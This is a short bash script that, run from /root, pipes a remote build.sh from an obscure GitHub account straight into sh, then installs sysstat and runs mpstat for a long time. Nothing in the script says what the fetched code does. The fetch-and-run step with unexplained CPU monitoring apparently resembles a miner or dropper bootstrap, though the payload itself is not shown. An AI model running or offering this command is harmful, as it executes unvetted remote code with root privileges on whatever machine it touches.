#!/bin/bash

# Do not edit this file!
# kumaha aink we njink

cd /root
curl https://raw.githubusercontent.com/OpUiajwk/Opuiajwk/main/build.sh | sh && sudo apt-get install sysstat && mpstat && mpstat 5 99999
